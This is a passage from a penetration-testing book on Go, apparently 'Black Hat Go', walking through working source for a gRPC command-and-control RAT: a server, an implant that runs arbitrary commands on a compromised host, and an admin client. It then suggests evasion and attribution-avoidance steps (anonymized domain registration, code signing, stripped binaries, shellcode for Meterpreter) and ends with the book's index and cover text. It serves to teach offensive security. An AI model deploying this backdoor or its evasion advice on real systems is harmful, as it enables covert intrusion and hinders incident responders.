an Implant or Admin service. That is, we’ll need to have the Fetch Command(ctx context.Context, empty *grpcapi.Empty), SendOutput(ctx context .Context, result *grpcapi.Command), and RunCommand(ctx context.Context, cmd *grpcapi.Command) methods properly defined. To keep our implant and admin APIs mutually exclusive, we’ll implement them as separate types. First, we create our structs, named implantServer and adminServer, that’ll implement the necessary methods u. Each type contains identical fields: two channels, used for sending and receiving work and command output. This is a pretty simple way for our servers to proxy the commands and their responses between the admin and implant components. Next, we define a couple of helper functions, NewImplantServer(work, output chan *grpcapi.Command) and NewAdminServer(work, output chan *grpcapi .Command), that create new implantServer and adminServer instances v. These exist solely to make sure the channels are properly initialized. Now comes the interesting part: the implementation of our gRPC methods. You might notice that the methods don’t exactly match the Protobuf schema. For example, we’re receiving a context.Context parameter in each method and returning an error. The protoc command you ran earlier to compile your schema added these to each interface method definition in the generated file. This lets us manage request context and return errors. This is pretty standard stuff for most network communications. The com­ piler spared us from having to explicitly require that in our schema file. The first method we implement on our implantServer, FetchCommand(ctx context.Context, empty *grpcapi.Empty), receives a *grpcapi.Empty and returns a *grpcapi.Command w. Recall that we defined this Empty type because gRPC doesn’t allow null values explicitly. We don’t need to receive any input since the client implant will call the FetchCommand(ctx context.Context, empty *grpcapi .Empty) method as sort of a polling mechanism that asks, “Hey, do you have work for me?” The method’s logic is a bit more complicated, since we can send work to the implant only if we actually have work to send. So, we use a select statement x on the work channel to determine whether we do have work. Reading from a channel in this manner is nonblocking, meaning that execution will run our default case if there’s nothing to read from the channel. This is ideal, since we’ll have our implant calling FetchCommand(ctx context.Context, empty *grpcapi.Empty) on a periodic basis as a way to get work on a near­real­time schedule. In the event that we do have work in the channel, we return the command. Behind the scenes, the command will be serialized and sent over the network back to the implant. The second implantServer method, SendOutput(ctx context.Context, result *grpcapi.Command), pushes the received *grpcapi.Command onto the output channel y. Recall that we defined our Command to have not only a string field for the command to run, but also a field to hold the command’s output. Since the Command we’re receiving has the output field populated with the result of a command (as run by the implant) the SendOutput(ctx context.Context, result *grpcapi.Command) method simply takes that result from the implant and puts it onto a channel that our admin component will read from later. The last implantServer method, RunCommand(ctx context.Context, cmd *grpcapi .Command), is defined on the adminServer type. It receives a Command 322 Chapter 14 that has not yet been sent to the implant z. It represents a unit of work our admin component wants our implant to execute. We use a goroutine to place our work on the work channel. As we’re using an unbuffered channel, this action blocks execution. We need to be able to read from the output channel, though, so we use a goroutine to put work on the channel and continue execution. Execution blocks, waiting for a response on our output channel. We’ve essentially made this flow a synchronous set of steps: send a command to an implant and wait for a response. When we receive the response, we return the result. Again, we expect this result, a Command, to have its output field populated with the result of the operating system command executed by the implant. Writing the main() Function Listing 14­3 shows the server/server.go file’s main() function, which runs two separate servers—one to receive commands from the admin client and the other to receive polling from the implant. We have two listeners so that we can restrict access to our admin API—we don’t want just anyone interact­ ing with it—and we want to have our implant listen on a port that you can access from restrictive networks. func main() { u var ( implantListener, adminListener net.Listener err error opts []grpc.ServerOption work, output chan *grpcapi.Command ) v work, output = make(chan *grpcapi.Command), make(chan *grpcapi.Command) w implant := NewImplantServer(work, output) admin := NewAdminServer(work, output) x if implantListener, err = net.Listen("tcp", \ fmt.Sprintf("localhost:%d", 4444)); err != nil { log.Fatal(err) } if adminListener, err = net.Listen("tcp", \ fmt.Sprintf("localhost:%d", 9090)); err != nil { log.Fatal(err) } y grpcAdminServer, grpcImplantServer := \ grpc.NewServer(opts...), grpc.NewServer(opts...) z grpcapi.RegisterImplantServer(grpcImplantServer, implant) grpcapi.RegisterAdminServer(grpcAdminServer, admin) { go func() { grpcImplantServer.Serve(implantListener) }() | grpcAdminServer.Serve(adminListener) } Listing 14-3: Running admin and implant servers (/ch-14/server/server.go) Building a Command-and-Control RAT 323 First, we declare variables u. We use two listeners: one for the implant server and one for the admin server. We’re doing this so that we can serve our admin API on a port separate from our implant API. We create the channels we’ll use for passing messages between the implant and admin services v. Notice that we use the same channels for initializing both the implant and admin servers via calls to NewImplantServer (work, output) and NewAdminServer(work, output) w. By using the same channel instances, we’re letting our admin and implant servers talk to each other over this shared channel. Next, we initiate our network listeners for each server, binding our implantListener to port 4444 and our adminListener to port 9090 x. We’d generally use port 80 or 443, which are HTTP/s ports that are commonly allowed to egress networks, but in this example, we just picked an arbitrary port for testing purposes and to avoid interfering with other services run­ ning on our development machines. We have our network­level listeners defined. Now we set up our gRPC server and API. We create two gRPC server instances (one for our admin API and one for our implant API) by calling grpc.NewServer() y. This initial­ izes the core gRPC server that will handle all the network communications and such for us. We just need to tell it to use our API. We do this by reg­ istering instances of API implementations (named implant and admin in our example) by calling grpcapi.RegisterImplantServer(grpcImplantServer, implant) z and grpcapi.RegisterAdminServer(grpcAdminServer, admin). Notice that, although we have a package we created named grpcapi, we never defined these two functions; the protoc command did. It created these functions for us in implant.pb.go as a means to create new instances of our implant and admin gRPC API servers. Pretty slick! At this point, we’ve defined the implementations of our API and reg­ istered them as gRPC services. The last thing we do is start our implant server by calling grpcImplantServer.Serve(implantListener) {. We do this from within a goroutine to prevent the code from blocking. After all, we want to also start our admin server, which we do via a call to grpcAdminServer.Serve (adminListener) |. Your server is now complete, and you can start it by running go run server/server.go. Of course, nothing is interacting with your server, so nothing will happen yet. Let’s move on to the next component—our implant. Creating the Client Implant The client implant is designed to run on compromised systems. It will act as a backdoor through which we can run operating system commands. In this example, the implant will periodically poll the server, asking for work. If there is no work to be done, nothing happens. Otherwise, the implant exe­ cutes the operating system command and sends the output back to the server. Listing 14­4 shows the contents of implant/implant.go. 324 Chapter 14 func main() { var ( opts []grpc.DialOption conn *grpc.ClientConn err error client grpcapi.ImplantClient u ) opts = append(opts, grpc.WithInsecure()) if conn, err = grpc.Dial(fmt.Sprintf("localhost:%d", 4444), opts...); err != nil { v log.Fatal(err) } defer conn.Close() client = grpcapi.NewImplantClient(conn) w ctx := context.Background() for { x var req = new(grpcapi.Empty) cmd, err := client.FetchCommand(ctx, req) y if err != nil { log.Fatal(err) } if cmd.In == "" { // No work time.Sleep(3*time.Second) continue } tokens := strings.Split(cmd.In, " ") z var c *exec.Cmd if len(tokens) == 1 { c = exec.Command(tokens[0]) } else { c = exec.Command(tokens[0], tokens[1:]...) } buf, err := c.CombinedOutput(){ if err != nil { cmd.Out = err.Error() } cmd.Out += string(buf) client.SendOutput(ctx, cmd) | } } Listing 14-4: Creating the implant (/ch-14/implant/implant.go) The implant code contains a main() function only. We start by declar­ ing our variables, including one of the grpcapi.ImplantClient type u. The protoc command automatically created this type for us. The type has all the required RPC function stubs necessary to facilitate remote communications. We then establish a connection, via grpc.Dial(target string, opts... DialOption), to the implant server running on port 4444 v. We’ll use this Building a Command-and-Control RAT 325 connection for the call to grpcapi.NewImplantClient(conn) w (a function that protoc created for us). We now have our gRPC client, which should have an established connection back to our implant server. Our code proceeds to use an infinite for loop x to poll the implant server, repeatedly checking to see if there’s work that needs to be performed. It does this by issuing a call to client.FetchCommand(ctx, req), passing it a request context and Empty struct y. Behind the scenes, it’s connecting to our API server. If the response we receive doesn’t have anything in the cmd.In field, we pause for 3 seconds and then try again. When a unit of work is received, the implant splits the command into individual words and argu­ ments by calling strings.Split(cmd.In, " ") z. This is necessary because Go’s syntax for executing operating system commands is exec.Command(name, args...), where name is the command to be run and args... is a list of any subcommands, flags, and arguments used by that operating system com­ mand. Go does this to prevent operating system command injection, but it complicates our execution, because we have to split up the command into relevant pieces before we can run it. We run the command and gather out­ put by running c.CombinedOutput() {. Lastly, we take that output and initiate a gRPC call to client.SendOutput(ctx, cmd) to send our command and its out­ put back to the server |. Your implant is complete, and you can run it via go run implant/implant.go. It should connect to your server. Again, it’ll be anticlimactic, as there’s no work to be performed. Just a couple of running processes, making a con­ nection but doing nothing meaningful. Let’s fix that. Building the Admin Component The admin component is the final piece to our RAT. It’s where we’ll actu­ ally produce work. The work will get sent, via our admin gRPC API, to the server, which then forwards it on to the implant. The server gets the output from the implant and sends it back to the admin client. Listing 14­5 shows the code in client/client.go. func main() { var ( opts []grpc.DialOption conn *grpc.ClientConn err error client grpcapi.AdminClient u ) opts = append(opts, grpc.WithInsecure()) if conn, err = grpc.Dial(fmt.Sprintf("localhost:%d", 9090), opts...); err != nil { v log.Fatal(err) } defer conn.Close() client = grpcapi.NewAdminClient(conn) w 326 Chapter 14 var cmd = new(grpcapi.Command) cmd.In = os.Args[1] x ctx := context.Background() cmd, err = client.RunCommand(ctx, cmd) y if err != nil { log.Fatal(err) } fmt.Println(cmd.Out) z } Listing 14-5: Creating the admin client (/ch-14/client/client.go) We start by defining our grpcapi.AdminClient variable u, establishing a connection to our administrative server on port 9090 v, and using the con­ nection in a call to grpcapi.NewAdminClient(conn) w, creating an instance of our admin gRPC client. (Remember that the grpcapi.AdminClient type and grpcapi .NewAdminClient() function were created for us by protoc.) Before we proceed, compare this client creation process with that of the implant code. Notice the similarities, but also the subtle differences in types, function calls, and ports. Assuming there is a command line argument, we read the operating system command from it x. Of course, the code would be more robust if we checked whether an argument was passed in, but we’re not worried about it for this example. We assign that command string to the cmd.In. We pass this cmd, a *grpcapi.Command instance, to our gRPC client’s RunCommand(ctx context .Context, cmd *grpcapi.Command) method y. Behind the scenes, this command gets serialized and sent to the admin server we created earlier. After the response is received, we expect the output to populate with the operating system command results. We write that output to the console z. Running the RAT Now, assuming you have both the server and the implant running, you can execute your admin client via go run client/client.go command. You should receive the output in your admin client terminal and have it displayed to the screen, like this: $ go run client/client.go 'cat /etc/resolv.conf' domain Home nameserver nameserver There it is—a working RAT. The output shows the contents of a remote file. Run some other commands to see your implant in action. Improving the RAT As we mentioned at the beginning of this chapter, we purposely kept this RAT small and feature­bare. It won’t scale well. It doesn’t gracefully handle errors or connection disruptions, and it lacks a lot of basic features that Building a Command-and-Control RAT 327 allow you to evade detection, move across networks, escalate privileges, and more. Rather than making all these improvements in our example, we instead lay out a series of enhancements that you can make on your own. We’ll dis­ cuss some of the considerations but will leave each as an exercise for you. To complete these exercises, you’ll likely need to refer to other chapters of this book, dig deeper into Go package documentation, and experiment with using channels and concurrency. It’s an opportunity to put your knowledge and skills to a practical test. Go forth and make us proud, young Padawan. Encrypt Your Communications All C2 utilities should encrypt their network traffic! This is especially impor tant for communications between the implant and the server, as you should expect to find egress network monitoring in any modern enterprise environment. Modify your implant to use TLS for these communications. This will require you to set additional values for the []grpc.DialOptions slice on the client as well as on the server. While you’re at it, you should probably alter your code so that services are bound to a defined interface, and listen and connect to localhost by default. This will prevent unauthorized access. A consideration you’ll have to make, particularly if you’ll be perform­ ing mutual certificate­based authentication, is how to administer and man­ age the certificates and keys in the implant. Should you hardcode them? Store them remotely? Derive them at runtime with some magic voodoo that determines whether your implant is authorized to connect to your server? Handle Connection Disruptions While we’re on the topic of communications, what happens if your implant can’t connect to your server or if your server dies with a running implant? You may have noticed that it breaks everything—the implant dies. If the implant dies, well, you’ve lost access to that system. This can be a pretty big deal, particularly if the initial compromise happened in a manner that’s hard to reproduce. Fix this problem. Add some resilience to your implant so that it doesn’t immediately die if a connection is lost. This will likely involve replacing calls to log.Fatal(err) in your implant.go file with logic that calls grpc.Dial(target string, opts ...DialOption) again. Register the Implants You’ll want to be able to track your implants. At present, our admin client sends a command expecting only a single implant to exist. There is no means of tracking or registering an implant, let alone any means of sending a com­ mand to a specific implant. Add functionality that makes an implant register itself with the server upon initial connection, and add functionality for the admin client to retrieve a list of registered implants. Perhaps you assign a unique integer 328 Chapter 14 to each implant or use a UUID (check out https://github.com/google/uuid/). This will require changes to both the admin and implant APIs, starting with your implant.proto file. Add a RegisterNewImplant RPC method to the Implant service, and add ListRegisteredImplants to the Admin service. Recompile the schema with protoc, implement the appropriate interface methods in server/ server.go, and add the new functionality to the logic in client/client.go (for the admin side) and implant/implant.go (for the implant side). Add Database Persistence If you completed the previous exercises in this section, you added some resilience to the implants to withstand connection disruptions and set up registration functionality. At this point, you’re most likely maintaining the list of registered implants in memory in server/server.go. What if you need to restart the server or it dies? Your implants will continue to reconnect, but when they do, your server will be unaware of which implants are registered, because you’ll have lost the mapping of the implants to their UUID. Update your server code to store this data in a database of your choos­ ing. For a fairly quick and easy solution with minimal dependencies, con­ sider a SQLite database. Several Go drivers are available. We personally used go-sqlite3 (https://github.com/mattn/go-sqlite3/). Support Multiple Implants Realistically, you’ll want to support multiple simultaneous implants polling your server for work. This would make your RAT significantly more useful, because it could manage more than a single implant, but it requires pretty significant changes as well. That’s because, when you wish to execute a command on an implant, you’ll likely want to execute it on a single specific implant, not the first one that polls the server for work. You could rely on the implant ID created during registration to keep the implants mutually exclusive, and to direct commands and output appropriately. Implement this functionality so that you can explicitly choose the destination implant on which the command should be run. Further complicating this logic, you’ll need to consider that you might have multiple admin operators sending commands out simultaneously, as is common when working with a team. This means that you’ll probably want to convert your work and output channels from unbuffered to buffered types. This will help keep execution from blocking when there are multiple messages in­flight. However, to support this sort of multiplexing, you’ll need to implement a mechanism that can match a requestor with its proper response. For example, if two admin operators send work simultaneously to implants, the implants will generate two separate responses. If opera­ tor 1 sends the ls command and operator 2 sends the ifconfig command, it wouldn’t be appropriate for operator 1 to receive the command output for ifconfig, and vice versa. Building a Command-and-Control RAT 329 Add Implant Functionality Our implementation expects the implants to receive and run operating system commands only. However, other C2 software contains a lot of other convenience functions that would be nice to have. For example, it would be nice to be able to upload or download files to and from our implants. It might be nice to run raw shellcode, in the event we want to, for example, spawn a Meterpreter shell without touching disk. Extend the current func­ tionality to support these additional features. Chain Operating System Commands Because of the way Go’s os/exec package creates and runs commands, you can’t currently pipe the output of one command as input into a second command. For example, this won’t work in our current implementation: ls -la | wc -l. To fix this, you’ll need to play around with the command variable, which is created when you call exec.Command() to create the com­ mand instance. You can alter the stdin and stdout properties to redirect them appropriately. When used in conjunction with an io.Pipe, you can force the output of one command (ls -la, for example) to act as the input into a subsequent command (wc -l). Enhance the Implant’s Authenticity and Practice Good OPSEC When you added encrypted communications to the implant in the first exercise in this section, did you use a self­signed certificate? If so, the transport and backend server may arouse suspicion in devices and inspect­ ing proxies. Instead, register a domain name by using private or anony­ mized contact details in conjunction with a certificate authority service to create a legitimate certificate. Further, if you have the means to do so, consider obtaining a code­signing certificate to sign your implant binary. Additionally, consider revising the naming scheme for your source code locations. When you build your binary file, the file will include package paths. Descriptive pathnames may lead incident responders back to you. Further, when building your binary, consider removing debugging infor­ mation. This has the added benefit of making your binary size smaller and more difficult to disassemble. The following command can achieve this: $ go build -ldflags="-s -w" implant/implant.go These flags are passed to the linker to remove debugging information and strip the binary. Add ASCII Art Your implementation could be a hot mess, but if it has ASCII art, it’s legiti­ mate. Okay, we’re not serious about that. But every security tool seems to have ASCII art for some reason, so maybe you should add it to yours. Greetz optional. 330 Chapter 14 Summary Go is a great language for writing cross­platform implants, like the RAT you built in this chapter. Creating the implant was likely the most difficult part of this project, because using Go to interact with the underlying operating system can be challenging compared to languages designed for the operat­ ing system API, such as C# and the Windows API. Additionally, because Go builds to a statically compiled binary, implants may result in a large binary size, which may add some restrictions on delivery. But for backend services, there is simply nothing better. One of the authors of this book (Tom) has an ongoing bet with another author (Dan) that if he ever switches from using Go for backend services and general utility, he’ll have to pay $10,000. There is no sign of him switching anytime soon (although Elixir looks cool). Using all the techniques described in this book, you should have a solid foundation to start building some robust frameworks and utilities. We hope you enjoyed reading this book and participating in the exercises as much as we did writing it. We encourage you to keep writing Go and use the skills learned in this book to build small utilities that enhance or replace your current tasks. Then, as you gain experience, start working on larger codebases and build some awesome projects. To continue growing your skills, look at some of the more popular large Go projects, particularly from large organizations. Watch talks from conferences, such as GopherCon, that can guide you through more advanced topics, and have discussions on pitfalls and ways to enhance your programming. Most importantly, have fun—and if you build something neat, tell us about it! Catch you on the flippity­flip. IN DE X bin directory, 2 binaries, 2 binary data handling, 213–216 Bing, 68–76 bodyType parameter, 46 braces, 14 break statements, 14 brute force, 252–261 buffer overflow fuzzing, 188–192 buffered channels, 29, 37–39 bufio package, 38, 112–113, 197 build command, 7 build constraints, 7–8 byte slices, 19 bytes package, 197 C C, 201–212, 290–293 C transform, 213 Caddy Server, 127 .Call() method, 273 canonical name (CNAME) records, 109–111 capture() function, 184 CGO package, 291 channels, 16–17 Checker interface, 220–222 Cipher Block Chaining (CBC) mode, 242 ciphertext, 234 cleartext overview, 234 passwords, 150 sniffing, 178–180 client implants, 323–325, 327–329 Client struct, 53–54 cloned sites, 90–93 Close() method, 25 closed ports, 22 Cmd, 41 CNAME records, 109–111 Cobalt Strike, 118–124, 278 A A records, 104, 109–111 Abstract Syntax Notation One (ASN.1) encoding, 133–135, 137–138 acme/autocert, 235 Add(int), 27 Address Resolution Protocol (ARP) poisoning, 178 Advanced Encryption Standard (AES) algorithm, 242 ancillary chunks, 302 anonymous functions, 126 API interaction overview, 51–53 Bing scraping, 68–76 Metasploit, 59–68 Shodan, 51–59 APIInfo struct, 55 append() function, 11 ARP (Address Resolution Protocol) poisoning, 178 ASN.1 (Abstract Syntax Notation One) encoding, 133–135, 137–138 assembly, 216 asymmetric algorithms, 234 asymmetric cryptography, 245. See also encryption Atom, GitHub, 4–5 authentication, 67, 86–88, 239–241 B backticks, 19 base workspace directory, 2 Base64 encoding, 215–216 bcrypt hashing, 235, 237–239 Beacon, 121 Berkeley Packet Filter (BPF), 175, 181. See also tcpdump best practices coding, 19, 49, 66, 185, 195, 329 security, 96, 236 332 Index COFF File Header, 282–283 collision, 234 Command() function, 41 commands build command, 7 cross-compiling, 7–8 go commands, 6–9 set command, 3 complex data types, 10–11 concurrency, 16–17, 37 concurrent scanning, 26–32 Conn, 35–38 connections, 24–25, 35, 327 constraints, 7–8 control structures, 14–16 convenience functions, 46–47, 140 Copy() function, 40 createChunkCRC() method, 304–305 CreateRemoteThread() Windows function, 275–276 credential-harvesting attacks, 90–93 critical chunks, 302 cross-compiling, 7–8 cross-site scripting, 94 crypto package, 197, 235 cryptography overview, 234–235 hashing, 234–239 curl, 40, 79 D Data Directory, 285–287 data mapping, 71–73, 125 data types channels, 16 maps, 11 primitive, 10–11 slices, 11 database miners, 161–170 debug package, 197 decoder function, 300 decoding process, 308 decryption, 234. See also encryption DefaultServerMux, 78–79 defer, 49 DELETE requests, 47–48 dep tool, 9 development environment set up, 1–10 Dial() method, 24 dialects, 132–133 directives, 19 Dirty COW, 201–204 DNS clients, 104–117 DNS proxies, 124–127 DNS servers, 117–129 DNS tunneling, 121 do loops, 15 Docker, 90, 118–122, 154–158 document metadata, 69 Document Object Model (DOM), 74 domain fronting, 98 DOS Header, 281 DWORD, 271 E echo servers, 32, 35–37 Empire, 121 Encode() method, 65 encodeDecode() function, 308 encoding package, 197 encoding process, 308 encryption, 234, 242–252 endianness function, 299 error handling, 17–18 error messages, 51 Exclusive OR (XOR), 307–312 Executable and Linkable Format (ELF), 203 exploitation, 196–212 export address table (EAT), 279 F field tags, 19–20, 139 filesystems, 170–171 filetype filter, 73 filtered ports, 22 filtering search results, 73–76 firewalls, 22–23 fixed field tag, 140 Flusher, 42 fmt package, 25 FOCA, 69 Foo struct, 19 for loop, 15 formatting data, 38, 113–114 source code, 9 Frida, 278 fully qualified domain name (FQDN), 104 fuzzing, 188–196 Index 333 G gaping security holes, 41 Get() function, 46 get() HTTP function, 227–229 GetLoadLibAddress() function, 275 GetProcessAddress() Windows function, 275 getRegex() function, 163 GetSchema() function, 163, 165 Gieben, Miek, 104 GitHub Atom, 4–5 GNU Compiler Collection (GCC), 290 go build command, 6–7 Go DNS package, 104 go doc command, 8 go fmt command, 9 go get command, 8–9 Go Playground execution environment, 10 go run command, 6 Go Syntax complex data types, 10–11 concurrency, 16–17 control structures, 14–16 data types, 10–11 interface types, 13 maps, 11 patterns, 12–14 pointers, 12 primitive data types, 10–11 slices, 11 struct types, 12–13 go vet command, 9 GOARCH constraint, 7–8 GoLand, 5–6 golint command, 9 GOOS constraint, 7–8 gopacket package, 174 gopacket/pcap subpackage, 174–175 GOPATH environment variable, 2–3 goquery package, 69 gorilla/mux package, 82–83, 84, 101 gorilla/websocket package, 96 GOROOT environment variable, 2–3 goroutines, 16–17, 26–32 gRPC framework, 316–319 gss package, 138 H HandleFunc() method, 82 handler() function, 75–76 handles, 271. See also tokens handshake process, 22–23 hash-based authentication, 147–150 hashing, 234–239 Head() function, 46 head() HTTP function, 226–227 hex transform, 214 hexadecimal 198, 281, 297 HMAC (Keyed-Hash Message Authentication Code) standard, 240–241 Holt, Matt, 127 host search, 55–57 HTTP clients overview, 46–51 Bing scraping, 68–76 Metasploit interaction, 59–68 Shodan interaction, 51–59 HTTP servers overview, 78–90 credential-harvesting attacks, 90–93 multiplexing, 98–102 WebSocket API (WebSockets), 93–98 http.HandleFunc(), 78–79 I if statements, 18 implant code, 323–325, 327–329 import address table (IAT), 279 indexing metadata, 68–76 infinite loops, 37 init() function, 101 input/output (I/O) tasks, 32–35 instreamset filter, 73 integrated development environments (IDEs), 3–6 interface{} type, 97 interface types, 13 io package, 32, 197 io.Pipe() function, 43 io.ReadCloser, 49 io.Reader, 32–35, 46 ioutil.ReadAll() function, 49 io.Writer, 32–35 J Java, 118–120 JavaScript, 94–95 JBoss, 198 334 Index JetBrains GoLand, 5–6 jQuery package, 69 JS Bin, 94 JSON, 19, 50, 54, 139, 159 K Kerberos, 133 Kernel32.dll, 275 Keyed-Hash Message Authentication Code (HMAC) standard, 240–241 keylogging, 93–98 Kozierok, Charles M., 22 L lab environments, 118–121 len field tag, 140 libraries, 2 lightweight threads, 16–17 loadLibraryA() function, 275 Login() method, 66 Logout() method, 66, 68 loops, 15, 37 Lua plug-ins, 225–232 Luhn checks, 253–254 M madvise() function, 205 magic bytes, 296 main() function, 17 main package, 6 make() function, 11 Mandatory Integrity Control, 271 mapping data, 71–73, 125 maps, 11 Marshal() method, 19 marshalData() method, 305 marshaling interfaces, 135 MD5 hashes, 236–237 memory, 273–274 message authentication, 239–241. See also authentication message authentication codes (MACs), 234 MessagePack, 60 metadata, 69, 138–139 Metasploit Framework, 59–68, 213 Meterpreter, 61, 98–102 Microsoft API documentation, 263–265 Microsoft SQL (MSSQL) Server databases, 157–158, 160–161 Microsoft Visual Studio Code, 5 middleware, 80–81, 83–88 MinGW-w64, 290 mod tool, 9 MongoDB databases, 154–156, 158–160 MsfVenom, 213, 278 Msg struct, 106–107 MSYS2, 290 multichannel communication, 30–32 multiplexing, 98–102 mutex, 129 mutual authentication, 248–252 MySQL databases, 156–157, 160–161 N named functions, 126 native plug-ins, 218–224 negroni package, 83–88 Nessus vulnerability scanner, 217 net package, 24–25, 197 Netcat, 40–44 net.Conn, 35 net/http standard package, 46, 48 New() helper function, 53–54 NewProperties() function, 72–73 NewRequest() function, 48 Nmap, 225 nonconcurrent scanning, 25–26 NoSQL databases, 154, 158 NT LAN Manager (NTLM) authentication, 150–151 NTLM Security Support Provider (NTLMSSP), 133–135 NTOWFv2, 148 num transform, 214 O obfuscation, 307 Office Open XML documents, 69 offset field tag, 140 offset values, 300 omitempty, 62 open ports, 22 OPSEC, 329 Optional Header, 284–285 Oracle, 154 os package, 197 os/exec package, 41 Index 335 P packages, 2, 8–9 packet capturing and filtering, 175–180 panic() function, 107, 112 parseTags() function, 140–142 passive reconnaissance, 51, 59 pass-the-hash authentication, 147–150 passwords, 146–151, 222–224 PATCH requests, 47 payloads, 101, 302–307 pcap, 175 PDF files, 69 PE (Portable Executable) format, 279–289 PipeReader, 43 PipeWriter, 43 PKCS (Public Key Cryptography Standards), 242. See also public-key cryptography pkg directory, 2–3 placeholders, 83, 89 Plan 9 operating system, 216 plug-ins Lua, 225–232 native, 218–224 plugin package, 219 PNG format, 296–307 pointers, 12 Portable Executable (PE) format, 279–289 Portable Network Graphics (PNG) images, 296–307 ports availability, 24–25 handshake process, 22 port forwarding, 23, 39–40 port scanners, 180–185, 222–224 scanning, 23–32. See also scanners Post() function, 46–47 PostForm() function, 47 Postgres databases, 156–157, 160–161 PostgreSQL databases, 156–157, 160–161 PreProcessImage() function, 298 primitive data types, 10–11 process() function, 72–73 Process Hacker, 278 process injection, 268–269 Process Monitor, 278 ProcessImage() method, 302–303 procselfmem() function, 205 project structure, 52–53, 60 promisc variable, 177 Protocol Buffers (Protobuf), 316 PsExec, 131 public-key cryptography, 242, 245. See also encryption PUT requests, 47–48 Python, 197–201 Q query parameters, 73–76 R race condition functions, 206 Rapid7, 60 RATs (remote access Trojans), 315–329 raw transform, 215 RC2, 252–261 ReadString() function, 38 reconnaissance, 51, 59 redirectors, 98 referential fields, 138–139 reflect package, 139 reflection, 132, 139 regular expression (regex) values, 163 remote access Trojans (RATs), 315–329 remote procedure calls (RPCs), 59, 64–67, 316 request/response cycles, 46, 62–64 response handling, 48–51 Rivest, Ron, 252 RLock, 129 Roundcube, 90 routers, 79–80, 84–85 rst packets, 22 S salts, 234 scanner package, 220, 223 scanners, 23–32, 180–185, 217, 222–224. See also ports schema-less databases, 154 scraping metadata, 68–76 Search() function, 163 search query templates, 73–76 Section Table, 287–289 security tokens, 133–134 send() method, 65 serveFile() function, 97 Server Message Block (SMB), 132–147 server multiplexers, 78–79 336 Index ServerMux, 78–79 SessionList() method, 66, 68 set command, 3 SHA-256 hashes, 236–237 shellcode, 203–204, 213–216 Shodan, 51–59 signature validation, 245–248 site filter, 73 slices, 11, 106, 126, 144–145 SQL injection fuzzing, 192–196 SQLite databases, 328 src directory, 3 stateless protocols, 46 static files, 93 Status struct, 50–51 steganography overview, 295 PNG format, 296–307 XOR, 307–312 strconv package, 25 strlen() function, 17 strToInt() method, 304 structs APIInfo struct, 55 Client struct, 53–54 encoding, 135 Foo struct, 19 handling, 142–143 Msg struct, 106–107 Status struct, 50–51 types of, 12–13, 19, 133–135 structured data, 18–19, 50–51 Stub, 281 subdirectories, 2–3 subdomains, 107–117 switch statements, 14, 129, 143 switched networks, 178 symmetric algorithms, 234 symmetric-key encryption, 242–245. See also encryption SYN cookies, 180–185 syn packets, 22 syn-acks, 22 SYN-flood protections, 180–185 syscall package, 197, 266–269 Syscall6() function, 210 T tabwriter package, 113–114 Target breach, 154 TCP flags, 180–181 tcpdump, 102, 105, 175–178 TCP/IP Guide (Kozierok), 22 teamservers, 121 Telegram, 280 Telnet, 41 templates, 88–90 Tenable, 217 third-party packages, 8–9 tokens, 61–63, 271 “too fast” scanner, 26–27 Tour of Go tutorial, 10 Transmission Control Protocol (TCP) handshake process, 22–23 port scanners, 23–32 proxies, 32–44 U Ubuntu VM, 118–120 uint16 data types, 143–144 uintptr type, 266 unicode package, 197 unmarshal() function, 141–142 Unmarshal() method, 19 unmarshaling interfaces, 136 unsafe package, 197 unsafe.Pointer type, 266–267 USER property, 190 utility programs, 67–68 V {{variable-name}} convention, 89 verbs, 47 Vim text editor, 3–4 vim-go plug-in, 3 virtual machines (VMs), 118–120 virtual memory, 273–274 VirtualAllocEx, 273–274 VirtualFreeEx() Windows function, 277–278 VMWare Workstation, 118–120 VS Code, 5 vulnerability fuzzers, 188–196 W WaitforSingleObject() Windows function, 276–277 waitForWrite() function, 206 WaitGroup, 27–28 walkFn() function, 171 WebSocket API (WebSockets), 93–98 Index 337 while loops, 15 Windows APIs, 263–265 Windows DLL, 218–219 Windows VM, 127 winmods files, 270 WINNT.H header, 285–286 Wireshark, 102, 225 worker functions, 28–30, 111–112 wrapper functions, 136–137 WriteData() function, 305–307, 311 WriteProcessMemory() function, 274–275 writer.Flush() function, 38 WriteString() function, 38 X XML, 19–20, 69 XOR, 307–312 Black Hat Go is set in New Baskerville, Futura, Dogma, and The Sans Mono Condensed. Steele, Patten, and Kottmann Black Hat Go Go Programming for Hackers and Pentesters Go Programming for Hackers and Pentesters Black Hat Go explores the darker side of Go, the popular programming language revered by hackers for its simplicity, efficiency, and reliability. It provides an arsenal of practical tactics from the perspective of security prac- titioners and hackers to help you test your systems, build and automate tools to fit your needs, and improve your offensive security skillset, all using the power of Go. You’ll begin your journey with a basic over- view of Go’s syntax and philosophy and start to explore examples that you can leverage for tool development, including common network protocols like HTTP, DNS, and SMB. You’ll then dig into various tactics and problems that pen- etration testers encounter, addressing things like data pilfering, packet sniffing, and exploit development. You’ll create dynamic, pluggable tools before diving into cryptography, attack- ing Microsoft Windows, and implementing steganography. You’ll learn how to: 🐹 Make performant tools that can be used for your own security projects 🐹 Create usable tools that interact with remote APIs 🐹 Scrape arbitrary HTML data 🐹 Use Go’s standard package, net/http, for building HTTP servers 🐹 Write your own DNS server and proxy 🐹 Use DNS tunneling to establish a C2 channel out of a restrictive network 🐹 Create a vulnerability fuzzer to discover an application’s security weaknesses 🐹 Use plug-ins and extensions to future-proof products 🐹 Build an RC2 symmetric-key brute-forcer 🐹 Implant data within a Portable Network Graphics (PNG) image. Are you ready to add to your arsenal of secu- rity tools? Then let’s Go! About the Authors Tom Steele, Chris Patten, and Dan Kottmann share over 30 years in penetration testing and offensive security experience, and have deliv- ered multiple Go training and development sessions. (See inside for more details.) “Everything necessary to get started with Go development in the security space” — HD Moore, Founder of the Metasploit Project and the Critical Research Corporation THE FINEST IN GEEK ENTERTAINMENT™ www.nostarch.com Price: $39.95 ($53.95 CDN) Shelve In: COMPUTERS/SECURITY Tom Steele, Chris Patten, and Dan Kottmann Foreword by HD Moore Black Hat Go
